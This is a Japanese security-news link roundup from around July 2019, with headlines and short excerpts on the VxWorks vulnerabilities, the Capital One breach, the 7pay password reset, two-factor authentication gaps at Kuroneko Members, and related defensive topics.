2億台のデバイスに影響か――組み込み用リアルタイムOS「VxWorks」に11件の脆弱性を発見 - ITmedia エンタープライズ

VxWorksはルーターやプリンタ、SCADA、エレベーターなど幅広い機器に使われている。発見された脆弱性は「WannaCryマルウェアの拡散に利用されたEternalBlueの脆弱性に似ている」という。 組み込みシステム用リアルタイムOSの業界標準として、ルーターからファイアウォール、基幹インフラ、医療機器まで幅広い製品に採用...

はてなブックマーク - 2億台のデバイスに影響か――組み込み用リアルタイムOS「VxWorks」に11件の脆弱性を発見 - ITmedia エンタープライズ はてなブックマークに追加

JPCERT/CC、マルウェア分析支援ツールをGitHubで公開 – ZDNet Japan

JPCERT/CC、マルウェア分析支援ツールをGitHubで公開 - ZDNet Japan

JPCERT/CC、マルウェア分析支援ツールをGitHubで公開 - ZDNet Japan

JPCERTコーディネーションセンター(JPCERT/CC)は7月30日、マルウェアの設定情報を抽出する「MalConfScan」をGitHubで公開した。マルウェアの多くは過去に発見されたものの亜種で、多くの場合に設定情報だけ抽出できれば、マルウェア分析は完了するとしている。 MalConfScanは、メモリーフォレンジックツールの「The Vo...

はてなブックマーク - JPCERT/CC、マルウェア分析支援ツールをGitHubで公開 - ZDNet Japan はてなブックマークに追加

容疑者はAWS元従業員と現地報道、米金融大手で1億件超の個人情報漏洩 | 日経 xTECH(クロステック)

容疑者はAWS元従業員と現地報道、米金融大手で1億件超の個人情報漏洩 | 日経 xTECH(クロステック)

容疑者はAWS元従業員と現地報道、米金融大手で1億件超の個人情報漏洩 | 日経 xTECH(クロステック)

米金融大手のキャピタル・ワン・フィナンシャル・コーポレーションは2019年7月29日(現地時間)、顧客の個人情報が外部の個人に不正取得されたことを確認したと発表した。米国で約1億人、インドで約600万人に影響を及ぼしたという。同社は米国を中心にクレジットカード事業などを手掛ける。 漏洩した個人情報は、同社の...

はてなブックマーク - 容疑者はAWS元従業員と現地報道、米金融大手で1億件超の個人情報漏洩 | 日経 xTECH(クロステック) はてなブックマークに追加

“7iD” 会員のパスワードを強制的にリセットへ | NHKニュース

“7iD” 会員のパスワードを強制的にリセットへ | NHKニュース

“7iD” 会員のパスワードを強制的にリセットへ | NHKニュース

スマホ決済サービス、「7pay」の不正アクセス被害を受けて「セブン&アイ・ホールディングス」は、グループ各社が展開する通販サイトやアプリについて、利用の際に必要となる会員のパスワードを強制的にリセットすることを明らかにしました。 会員が引き続きサイトなどを利用するためには、新しいパスワードに再設定...

はてなブックマーク - “7iD” 会員のパスワードを強制的にリセットへ | NHKニュース はてなブックマークに追加

米金融大手Capital One、1億人超の顧客情報流出か 米紙は「過去最大規模」と報道 – ITmedia NEWS

米金融大手Capital One、1億人超の顧客情報流出か 米紙は「過去最大規模」と報道 - ITmedia NEWS

米金融大手Capital One、1億人超の顧客情報流出か 米紙は「過去最大規模」と報道 - ITmedia NEWS

米金融大手のCapital One Financialが、外部からの不正アクセスを受け、約1億600万人分の個人情報が漏えいした恐れがあると発表。 米金融大手のCapital One Financialは7月29日(現地時間)、外部からの不正アクセスを受け、計約1億600万人分(米国で約1億人分、カナダで約600万人分)の個人情報が漏えいした恐れがある...

はてなブックマーク - 米金融大手Capital One、1億人超の顧客情報流出か 米紙は「過去最大規模」と報道 - ITmedia NEWS はてなブックマークに追加

管理画面に汎用的で便利すぎる機能追加はもしかすると危険かもしれない – ぷぎがぽぎ

管理画面に汎用的で便利すぎる機能追加はもしかすると危険かもしれない - ぷぎがぽぎ

管理画面に汎用的で便利すぎる機能追加はもしかすると危険かもしれない - ぷぎがぽぎ

以前、PHPカンファレンスで運用しやすい気づける管理画面という発表*1しましたが、今もこの考え方を大事にしながら日々サービスの運用、開発をしています。 その中で、最近思ったことがあったのを社内kibelaにポエムってあったのですが、普通に公開できる内容だったのでここにちょっと加筆して投下しておきます。 サービ...

はてなブックマーク - 管理画面に汎用的で便利すぎる機能追加はもしかすると危険かもしれない - ぷぎがぽぎ はてなブックマークに追加

セブン、全会員のパスワードを強制リセット 1650万人  :日本経済新聞

セブン、全会員のパスワードを強制リセット 1650万人  :日本経済新聞

セブン、全会員のパスワードを強制リセット 1650万人  :日本経済新聞

セブン&アイ・ホールディングス(HD)は30日、スマートフォンアプリやインターネット通販サイトの利用に必要なグループ共通IDのパスワードリセットを始めたと発表した。バーコード決済サービスが不正利用された事件に対応し、安全性を担保したい考え。共通ID「7iD」会員全約1650万人が対象で、パスワードを再設定しない...

はてなブックマーク - セブン、全会員のパスワードを強制リセット 1650万人  :日本経済新聞 はてなブックマークに追加

ダウンロード - シグネチャ更新ファイル – MCセキュリティ|新世代の情報セキュリティ

ダウンロード - シグネチャ更新ファイル – MCセキュリティ|新世代の情報セキュリティ

ダウンロード - シグネチャ更新ファイル – MCセキュリティ|新世代の情報セキュリティ

MCセキュリティ|新世代の情報セキュリティ お問い合わせ | サイトマップ MCセキュリティは、お客様の重要資産を守り、より安全なネットワーク環境を提供するための新世代の情報セキュリティを提供します。

はてなブックマーク - ダウンロード - シグネチャ更新ファイル – MCセキュリティ|新世代の情報セキュリティ はてなブックマークに追加

女子高生ハッカーによる、攻撃手法から学ぶセキュリティ入門【CV内田真礼】|paizaラーニング

女子高生ハッカーによる、攻撃手法から学ぶセキュリティ入門【CV内田真礼】|paizaラーニング

女子高生ハッカーによる、攻撃手法から学ぶセキュリティ入門【CV内田真礼】|paizaラーニング

※本講座に使われている技術、攻撃手法は実際のものであり、本講座外での外部サイト への攻撃は不正アクセス禁止法に抵触し、取り締まり対象となりますのでご注意ください。 ※この物語はフィクションです。実在の団体や人物と一切関係はありません。 「攻撃手法から学ぶハッカー入門」は、誰もがホワイトハッカーになれる...

はてなブックマーク - 女子高生ハッカーによる、攻撃手法から学ぶセキュリティ入門【CV内田真礼】|paizaラーニング はてなブックマークに追加

【CV内田真礼】女子高生ハッカーによる、攻撃手法から学ぶ「Webセキュリティ入門編」を無料公開!|ギノのプレスリリース

【CV内田真礼】女子高生ハッカーによる、攻撃手法から学ぶ「Webセキュリティ入門編」を無料公開!|ギノのプレスリリース

【CV内田真礼】女子高生ハッカーによる、攻撃手法から学ぶ「Webセキュリティ入門編」を無料公開!|ギノのプレスリリース

エムアウトグループで、ITエンジニア向け総合求職・学習サービス『paiza(パイザ)https://paiza.jp』を運営するギノは、環境構築不要・5秒で学習開始できるプログラミング学習サービス『paizaラーニング https://paiza.jp/works』にて、新レッスン「攻撃手法から学ぶハッカー入門(Webセキュリティ入門編) https://pa...

はてなブックマーク - 【CV内田真礼】女子高生ハッカーによる、攻撃手法から学ぶ「Webセキュリティ入門編」を無料公開!|ギノのプレスリリース はてなブックマークに追加

米・金融大手「キャピタルワン」 1億人分の個人情報流出か | NHKニュース

米・金融大手「キャピタルワン」 1億人分の個人情報流出か | NHKニュース

米・金融大手「キャピタルワン」 1億人分の個人情報流出か | NHKニュース

アメリカやカナダで主にクレジットカード事業を展開する金融大手の「キャピタルワン」は29日、クレジットカードの顧客などの合わせて1億人分の個人情報が、外部に流出した可能性があると発表しました。

はてなブックマーク - 米・金融大手「キャピタルワン」 1億人分の個人情報流出か | NHKニュース はてなブックマークに追加

「いいね!」ボタン、設置したサイトもユーザーデータに責任–EU司法裁 – CNET Japan

「いいね!」ボタン、設置したサイトもユーザーデータに責任--EU司法裁 - CNET Japan

「いいね!」ボタン、設置したサイトもユーザーデータに責任--EU司法裁 - CNET Japan

Facebookの「いいね!」ボタンは、インターネットで特に複雑なツールには見えないかもしれない。だが、この上向きの親指には、見た目以上の機能がある。たとえば、企業の中には、自社サイトに「いいね!」ボタンをプラグインとして組み込み、ユーザーのデータをFacebookに送信しているところもある。だが、欧州連合(EU...

はてなブックマーク - 「いいね!」ボタン、設置したサイトもユーザーデータに責任--EU司法裁 - CNET Japan はてなブックマークに追加

マイクロソフトがブロックチェーン事例を紹介、複数企業の協調作業は3週間を3日に短縮 | IT Leaders

マイクロソフトがブロックチェーン事例を紹介、複数企業の協調作業は3週間を3日に短縮 | IT Leaders

マイクロソフトがブロックチェーン事例を紹介、複数企業の協調作業は3週間を3日に短縮 | IT Leaders

IT Leaders トップ > テクノロジー一覧 > ブロックチェーン > 事例ニュース > マイクロソフトがブロックチェーン事例を紹介、複数企業の協調作業は3週間を3日に短縮 ブロックチェーン ブロックチェーン記事一覧へ [事例ニュース] マイクロソフトがブロックチェーン事例を紹介、複数企業の協調作業は3週間を3日に短縮...

はてなブックマーク - マイクロソフトがブロックチェーン事例を紹介、複数企業の協調作業は3週間を3日に短縮 | IT Leaders はてなブックマークに追加

2019年7月の、これだけは押さえておきたいWeb関連の動き | Stocker.jp / diary

2019年7月の、これだけは押さえておきたいWeb関連の動き | Stocker.jp / diary

2019年7月の、これだけは押さえておきたいWeb関連の動き | Stocker.jp / diary

Webニュース 2019年7月の、これだけは押さえておきたいWeb関連の動き Tuesday, July 30th, 2019 「Web系の最新情報を知りたいけど、日々業務が忙しくて追いかけられない」という方のために、1ヶ月のWeb系ニュースの中で「これだけは押さえておきたい」というものを1つの記事にまとめています。 デザイン・UI Sketch – Sk...

はてなブックマーク - 2019年7月の、これだけは押さえておきたいWeb関連の動き | Stocker.jp / diary はてなブックマークに追加

「二段階認証を入れたから、オレのデータは安全」と思っているユーザーに伝えたいこと (1/3) – ITmedia エンタープライズ

「二段階認証を入れたから、オレのデータは安全」と思っているユーザーに伝えたいこと (1/3) - ITmedia エンタープライズ

「二段階認証を入れたから、オレのデータは安全」と思っているユーザーに伝えたいこと (1/3) - ITmedia エンタープライズ

半径300メートルのIT:「二段階認証を入れたから、オレのデータは安全」と思っているユーザーに伝えたいこと (1/3) セブン・ペイのモバイル決済の会見で、社長が「知らない」という趣旨の発言をしたことでも話題になった二段階認証。ユーザーの皆さんの間で定着している点は大変喜ばしいのですが……入れた「だけ」では安...

はてなブックマーク - 「二段階認証を入れたから、オレのデータは安全」と思っているユーザーに伝えたいこと (1/3) - ITmedia エンタープライズ はてなブックマークに追加

「DNSハイジャック」が世界的に広まる中で「.gov」ドメインを乗っ取られないためにアメリカ政府が取った施策とは? – GIGAZINE

「DNSハイジャック」が世界的に広まる中で「.gov」ドメインを乗っ取られないためにアメリカ政府が取った施策とは? - GIGAZINE

「DNSハイジャック」が世界的に広まる中で「.gov」ドメインを乗っ取られないためにアメリカ政府が取った施策とは? - GIGAZINE

by Roman Koester ドメイン・ネーム・システム(DNS)をハッキングしてデータを盗み取るハッカー集団「Sea Turtle」の活動が拡大していると2019年に入ってから報じられています。このようなハッカーたちの攻撃に備え、アメリカ連邦政府と地方行政機関が使用する「.gov」ドメインを管理する(PDFファイル)DotGov Programが新...

はてなブックマーク - 「DNSハイジャック」が世界的に広まる中で「.gov」ドメインを乗っ取られないためにアメリカ政府が取った施策とは? - GIGAZINE はてなブックマークに追加

Apple、macOS High Sierra/Sierra向けの「セキュリティアップデート 2019-004」とApple T2用BridgeOSのロールアウトを再開。 | AAPL Ch.

Apple、macOS High Sierra/Sierra向けの「セキュリティアップデート 2019-004」とApple T2用BridgeOSのロールアウトを再開。 | AAPL Ch.

Apple、macOS High Sierra/Sierra向けの「セキュリティアップデート 2019-004」とApple T2用BridgeOSのロールアウトを再開。 | AAPL Ch.

AppleがmacOS High Sierra/Sierra向けの「セキュリティアップデート 2019-004」とApple T2用BridgeOSのロールアウトを再開しています。詳細は以下から。  Appleは現地時

はてなブックマーク - Apple、macOS High Sierra/Sierra向けの「セキュリティアップデート 2019-004」とApple T2用BridgeOSのロールアウトを再開。 | AAPL Ch. はてなブックマークに追加

It’s Official – The Way We Recognize Our Security Researchers

We deeply appreciate the partnership of the many talented security researchers who report vulnerabilities to Microsoft through Coordinated Vulnerability Disclosure. We pay bounties for research in key areas, and each year at Black Hat USA, we’ve recognized the most impactful researchers helping to protect the ecosystem. That’s not changing; we’re continuing to expand our bounty …

It’s Official – The Way We Recognize Our Security Researchers Read More »

クロネコメンバーズの2段階認証“スマホだと無意味” ヤマト運輸「サービス全般を再点検していく」 – ねとらぼ

クロネコメンバーズの2段階認証“スマホだと無意味” ヤマト運輸「サービス全般を再点検していく」 - ねとらぼ

クロネコメンバーズの2段階認証“スマホだと無意味” ヤマト運輸「サービス全般を再点検していく」 - ねとらぼ

24日に不正ログインの被害を発表したヤマト運輸の会員制サービス「クロネコメンバーズ」が、一部環境において2段階認証が機能していなかったとして物議を醸しています。 クロネコメンバーズ 2段階認証説明ページ(以下、画像はクロネコメンバーズのサイトより) ヤマト運輸は「クロネコメンバーズ」に対してパスワードリ...

はてなブックマーク - クロネコメンバーズの2段階認証“スマホだと無意味” ヤマト運輸「サービス全般を再点検していく」 - ねとらぼ はてなブックマークに追加

滋賀県HPの不具合 複数の専門家が設計上の欠陥指摘(毎日新聞) – Yahoo!ニュース

滋賀県HPの不具合 複数の専門家が設計上の欠陥指摘(毎日新聞) - Yahoo!ニュース

滋賀県HPの不具合 複数の専門家が設計上の欠陥指摘(毎日新聞) - Yahoo!ニュース

3月末にリニューアルされた滋賀県のホームページ(HP)で不具合が多数発生した問題で、HPの設計(情報設計)に根本的な欠陥のある疑いがあることが、複数の専門家の指摘で分かった。県は緊急対策チームを設け「当初の不具合は改善できた」と説明するが、専門家は「このまま改善を進めても、問題は解消されないのでは」と...

はてなブックマーク - 滋賀県HPの不具合 複数の専門家が設計上の欠陥指摘(毎日新聞) - Yahoo!ニュース はてなブックマークに追加

ajitofm 47: セキュリティと利便性、脆弱性診断

ajitofm 47: セキュリティと利便性、脆弱性診断

ajitofm 47: セキュリティと利便性、脆弱性診断

徳丸さん、co3kさん、makogaさんと7pay、セキュリティと利便性、セッション長、脆弱性診断などについて話しました。 体系的に学ぶ 安全なWebアプリケーションの作り方 第2版[リフロー版] 脆弱性が生まれる原理と対策の実践 | 徳丸 浩 | プログラミング | Kindleストア | Amazon 7payの「二段階認証導入」は正解か? ...

はてなブックマーク - ajitofm 47: セキュリティと利便性、脆弱性診断 はてなブックマークに追加

クロネコメンバーズの二段階認証、スマホ向けログイン画面には実装されていなかった

先日ヤマト運輸の顧客向けサービス「クロネコメンバーズ」が不正アクセスを受ける事件があった(過去記事)。このサービスでは二段階認証によるセキュリティ強化が行われたものの、携帯端末向けサイトやアプリでは二段階認証を設定していても二段階認証を行わずにログインすることができたという(Togetterまとめ)。

クロネコメンバーズの「よくあるご質問(FAQ)」ページによると、「ヤマト運輸アプリとモバイルサイトからログインした場合は認証番号を求められません」とのことだが、モバイルサイトにPCからアクセスした場合でも2段階認証は求められないようだ。

すべて読む | セキュリティセクション | セキュリティ | インターネット | IT | 情報漏洩 | この記事をTwitterでつぶやく この記事をFacebookで共有 この記事をGoogle Plusで共有 このエントリーをはてなブックマークに追加

関連ストーリー:
ヤマト運輸のクロネコメンバーズサイトに不正アクセス、リスト型攻撃で情報漏洩 2019年07月26日
Googleが使い勝手の良い二段階認証を導入。PCのサインインをスマホ側で承認可能に 2016年06月23日
JALが携帯電話を使わない二段階認証を採用 2014年08月04日
Twitterの2段階認証、企業などの公式アカウントでは役に立たない? 2013年05月26日

急に外部APIとの通信が “dh key too small” で失敗するようになったのはなぜ? – BANK tech blog

急に外部APIとの通信が "dh key too small" で失敗するようになったのはなぜ? - BANK tech blog

急に外部APIとの通信が "dh key too small" で失敗するようになったのはなぜ? - BANK tech blog

こんにちは。最近TRAVEL Nowの開発にも顔を出すようになったうなすけです。今回はTRAVEL Nowの開発において発生した問題について書こうと思います。 外部API連携部分で突然のエラー TRAVEL Nowでは、外部のOTAと連携し、旅行商品を皆さんに提供しています。 そんな数多くのAPIのうち、ある特定のAPIで次のような例外が発...

はてなブックマーク - 急に外部APIとの通信が "dh key too small" で失敗するようになったのはなぜ? - BANK tech blog はてなブックマークに追加

リカー・イノベーションが提供する日本酒定期購入サービス「KURAND CLUB」サイトへの不正アクセスによる、お客様情報流出のお詫びとご報告 | KURAND(クランド)

リカー・イノベーションが提供する日本酒定期購入サービス「KURAND CLUB」サイトへの不正アクセスによる、お客様情報流出のお詫びとご報告 | KURAND(クランド)

リカー・イノベーションが提供する日本酒定期購入サービス「KURAND CLUB」サイトへの不正アクセスによる、お客様情報流出のお詫びとご報告 | KURAND(クランド)

このたび、弊社が運営する日本酒定期購入サービス「KURAND CLUB」のECサイト(https://kurand.jp/shop/club)(以下「当サイト」といいます。)の一部の脆弱性を突いた第三者の不正アクセスによって、ペイメントモジュールの改ざんが行われたため、一部のお客さまのクレジットカード情報を含む個人情報が流出したことが判明...

はてなブックマーク - リカー・イノベーションが提供する日本酒定期購入サービス「KURAND CLUB」サイトへの不正アクセスによる、お客様情報流出のお詫びとご報告 | KURAND(クランド) はてなブックマークに追加

どうして俺の回線が何百ギガもアップロードしてるの?と思った時に読む話 – 朝日ネット 技術者ブログ

どうして俺の回線が何百ギガもアップロードしてるの?と思った時に読む話 - 朝日ネット 技術者ブログ

どうして俺の回線が何百ギガもアップロードしてるの?と思った時に読む話 - 朝日ネット 技術者ブログ

はじめまして、朝日ネットでISPのインフラ保守を行っているa-fujisakiと申します。セキュリティ担当の一人としてお客様の所有されている機器がインターネット越しに悪用される事を防ぐ仕事をしています。 本記事では、インターネットが遅い、調べてみるとネットに接続した機器がアップロードを何百ギガと繰り返している...

はてなブックマーク - どうして俺の回線が何百ギガもアップロードしてるの?と思った時に読む話 - 朝日ネット 技術者ブログ はてなブックマークに追加

Keycloakとは | OSSでのシステム構築・デージーネット

Keycloakとは | OSSでのシステム構築・デージーネット

Keycloakとは | OSSでのシステム構築・デージーネット

KeycloakはWeb上でシングルサインオンを実現するオープンソースソフトウェアである。1回の認証で複数のサービスを利用することができるため、IDやパスワードの管理が容易になる。Keycloakはログインやアカウント管理のためにカスタマイズできるインターフェイスを提供している。またKeycloakは、既存のLDAPやActive Dire...

はてなブックマーク - Keycloakとは | OSSでのシステム構築・デージーネット はてなブックマークに追加

AWS re:Inforce 2019に参加してきました – クックパッド開発者ブログ

AWS re:Inforce 2019に参加してきました - クックパッド開発者ブログ

AWS re:Inforce 2019に参加してきました - クックパッド開発者ブログ

技術部セキュリティグループの三戸 (@mittyorz) です。こんにちは。 去る6/25,26日に開催されたAWS re:Inforce 2019に参加しましたので、簡単ではありますが紹介させていただきたいと思います。 今回が初開催なため規模感や雰囲気などは未知数の中、クックパッドからはセキュリティグループの三戸・水谷 (@m_mizutani)...

はてなブックマーク - AWS re:Inforce 2019に参加してきました - クックパッド開発者ブログ はてなブックマークに追加

PUFFY大貫亜美さんのインスタ、乗っ取られるも、「奪還成功」 – ITmedia NEWS

PUFFY大貫亜美さんのインスタ、乗っ取られるも、「奪還成功」 - ITmedia NEWS

PUFFY大貫亜美さんのインスタ、乗っ取られるも、「奪還成功」 - ITmedia NEWS

「PUFFY」の大貫亜美さんの公式Instagramが7月28日に第三者に乗っ取られ、スパム投稿が行われたが、29日未明までに本人がアカウントを取り返した。大貫さんは「乗っ取られてしまいましたが、無事奪還成功致しました!」などと投稿している。 ボーカルデュオ「PUFFY」の大貫亜美さんの公式Instagramが7月28日に第三者に乗...

はてなブックマーク - PUFFY大貫亜美さんのインスタ、乗っ取られるも、「奪還成功」 - ITmedia NEWS はてなブックマークに追加

PHPサーバーサイドプログラミングパーフェクトマスターのCSRF対策に脆弱性 | 徳丸浩の日記

PHPサーバーサイドプログラミングパーフェクトマスターのCSRF対策に脆弱性 | 徳丸浩の日記

PHPサーバーサイドプログラミングパーフェクトマスターのCSRF対策に脆弱性 | 徳丸浩の日記

サマリPHPサーバーサイドプログラミングパーフェクトマスターには、PHP入門書としては珍しくクロスサイト・リクエストフォージェリ(CSRF)対策についての説明があるが、その方法には問題がある。アルゴリズムとして問題があることに加えて、実装上の問題があり、そのままコピペして用いると脆弱性となる。 はじめに古庄親...

はてなブックマーク - PHPサーバーサイドプログラミングパーフェクトマスターのCSRF対策に脆弱性 | 徳丸浩の日記 はてなブックマークに追加

今さら聞けない「認証」のハナシ:二段階認証の意味を問う 「7pay事件」を教訓に見直したい認証のハナシ(要約) – ITmedia NEWS

今さら聞けない「認証」のハナシ:二段階認証の意味を問う 「7pay事件」を教訓に見直したい認証のハナシ(要約) - ITmedia NEWS

今さら聞けない「認証」のハナシ:二段階認証の意味を問う 「7pay事件」を教訓に見直したい認証のハナシ(要約) - ITmedia NEWS

専門用語が飛び交いがちなセキュリティの知識・話題について、「認証」関連分野を中心にできるだけ分かりやすく紹介する連載。今回は「二段階認証」と認証の仕組みについて。

はてなブックマーク - 今さら聞けない「認証」のハナシ:二段階認証の意味を問う 「7pay事件」を教訓に見直したい認証のハナシ(要約) - ITmedia NEWS はてなブックマークに追加

セキュリティ診断で防げない事故 | クロスイデアblog

セキュリティ診断で防げない事故 | クロスイデアblog

セキュリティ診断で防げない事故 | クロスイデアblog

ITコーディネータの吉田聖書(よしだみふみ)です。 前回、前々回と、 7payのセキュリティ事故を取り上げましたが、 今回はもう一つの側面を取り上げたいと思います。 特に前々回の記事について タイムリーな話題ということもあってか 予想以上に反響があり少々驚いています。 それだけ皆さんの関心が高い ということな...

はてなブックマーク - セキュリティ診断で防げない事故 | クロスイデアblog はてなブックマークに追加

国内約20万台のサーバが「DDoS攻撃に悪用される危険性」 A10ネットワークス調査:「特に通信サービス事業者は見直しが必要」 – @IT

国内約20万台のサーバが「DDoS攻撃に悪用される危険性」 A10ネットワークス調査:「特に通信サービス事業者は見直しが必要」 - @IT

国内約20万台のサーバが「DDoS攻撃に悪用される危険性」 A10ネットワークス調査:「特に通信サービス事業者は見直しが必要」 - @IT

「特に通信サービス事業者は見直しが必要」:国内約20万台のサーバが「DDoS攻撃に悪用される危険性」 A10ネットワークス調査 A10ネットワークスは、同社が提供する脅威インテリジェンスデータを基に、DDoS攻撃に利用される恐れのあるIoT(モノのインターネット)機器やサーバの数を調べた。日本のネットワークには、ア...

はてなブックマーク - 国内約20万台のサーバが「DDoS攻撃に悪用される危険性」 A10ネットワークス調査:「特に通信サービス事業者は見直しが必要」 - @IT はてなブックマークに追加

二段階認証の意味を問う 「7pay事件」を教訓に見直したい認証のハナシ (1/5) – ITmedia NEWS

二段階認証の意味を問う 「7pay事件」を教訓に見直したい認証のハナシ (1/5) - ITmedia NEWS

二段階認証の意味を問う 「7pay事件」を教訓に見直したい認証のハナシ (1/5) - ITmedia NEWS

専門用語が飛び交いがちなセキュリティの知識・話題について、「認証」関連分野を中心にできるだけ分かりやすく紹介する連載。今回は「二段階認証」と認証の仕組みについて。 ほとんどの人が日常的に行っている、ログイン、サインインなどの認証作業。認証で利用したパスワードが漏えいして第三者からの不正アクセスを受...

はてなブックマーク - 二段階認証の意味を問う 「7pay事件」を教訓に見直したい認証のハナシ (1/5) - ITmedia NEWS はてなブックマークに追加

米セキュリティ企業の内部ファイルにアクセスが可能なパスワードがGitHub上で公開されていた | TechCrunch Japan

米セキュリティ企業の内部ファイルにアクセスが可能なパスワードがGitHub上で公開されていた | TechCrunch Japan

米セキュリティ企業の内部ファイルにアクセスが可能なパスワードがGitHub上で公開されていた | TechCrunch Japan

誤ってインターネット上に公開されていた電子メールアドレスとパスワードを使って、とあるハッカーがセキュリティ企業でありSSL証明書の発行も行っているComodo(コモド)社の、内部ファイルとドキュメントへのアクセス権限を手に入れた。 この認証情報は、GitHub上にComodoのソフトウェア開発者が所有していた公開リポ...

はてなブックマーク - 米セキュリティ企業の内部ファイルにアクセスが可能なパスワードがGitHub上で公開されていた | TechCrunch Japan はてなブックマークに追加

Rubyプログラマが中学校で情報モラル講演会をしてきたよ – give IT a try

Rubyプログラマが中学校で情報モラル講演会をしてきたよ - give IT a try

Rubyプログラマが中学校で情報モラル講演会をしてきたよ - give IT a try

はじめに 先日、Rubyプログラマが本職である僕が、なぜか地元の中学校で情報モラル教育に関する講演をしてきました。 このエントリではなんでそんなことになったのか、そしてどんなことを話したのか、といった話を書いていきます。 【もくじ】 はじめに 講演を依頼されたいきさつ 去年の情報モラル講演会は本当にひどか...

はてなブックマーク - Rubyプログラマが中学校で情報モラル講演会をしてきたよ - give IT a try はてなブックマークに追加

海賊版サイト対策 ブロッキングの前にやるべきこと|楠 正憲(国際大学GLOCOM 客員研究員)

海賊版サイト対策 ブロッキングの前にやるべきこと|楠 正憲(国際大学GLOCOM 客員研究員)

海賊版サイト対策 ブロッキングの前にやるべきこと|楠 正憲(国際大学GLOCOM 客員研究員)

7月26日に知的財産戦略本部で海賊版サイト対策の議論が再開された。委員からはブロッキングの早期検討再開を求める意見が出たという。先の参院選では表現の自由、海賊版のアップロード側への対応が重要と訴えた山田太郎議員が自民党で比例2位の約54万票を獲得するなど、海賊版サイト対策のために表現の自由を犠牲にする...

はてなブックマーク - 海賊版サイト対策 ブロッキングの前にやるべきこと|楠 正憲(国際大学GLOCOM 客員研究員) はてなブックマークに追加

セブンとファミマ、スマホ決済導入で明暗の裏側(ニュースイッチ) – Yahoo!ニュース

セブンとファミマ、スマホ決済導入で明暗の裏側(ニュースイッチ) - Yahoo!ニュース

セブンとファミマ、スマホ決済導入で明暗の裏側(ニュースイッチ) - Yahoo!ニュース

セブン&アイ・ホールディングス(HD)のスマートフォン決済「セブンペイ」とファミリーマートの「ファミペイ」―。同じ1日にサービスを開始したが、セブンペイは不正アクセスにより開始4日で新規登録と入金を停止する事態に追い込まれ、両社の明暗が分かれた。年間約157億人が来店するコンビニエンスストアでのスマホ決...

はてなブックマーク - セブンとファミマ、スマホ決済導入で明暗の裏側(ニュースイッチ) - Yahoo!ニュース はてなブックマークに追加

Miyahan on Twitter: “【悲報】社員の民度・ITリテラシーの低さに起因する不祥事が止まらない弊社、ついにインターネットが完全許可制・ホワイトリスト運用に移行。 サイト(ドメイン)単位で利用目的・理由を記入の上、接続許可申請を提出し審査してもらわなくてはならない。”

Miyahan on Twitter: "【悲報】社員の民度・ITリテラシーの低さに起因する不祥事が止まらない弊社、ついにインターネットが完全許可制・ホワイトリスト運用に移行。 サイト(ドメイン)単位で利用目的・理由を記入の上、接続許可申請を提出し審査してもらわなくてはならない。"

Miyahan on Twitter: "【悲報】社員の民度・ITリテラシーの低さに起因する不祥事が止まらない弊社、ついにインターネットが完全許可制・ホワイトリスト運用に移行。 サイト(ドメイン)単位で利用目的・理由を記入の上、接続許可申請を提出し審査してもらわなくてはならない。"

【悲報】社員の民度・ITリテラシーの低さに起因する不祥事が止まらない弊社、ついにインターネットが完全許可制・ホワイトリスト運用に移行。 サイト(ドメイン)単位で利用目的・理由を記入の上、接続許可申請を提出し審査してもらわなくてはならない。

はてなブックマーク - Miyahan on Twitter: "【悲報】社員の民度・ITリテラシーの低さに起因する不祥事が止まらない弊社、ついにインターネットが完全許可制・ホワイトリスト運用に移行。 サイト(ドメイン)単位で利用目的・理由を記入の上、接続許可申請を提出し審査してもらわなくてはならない。" はてなブックマークに追加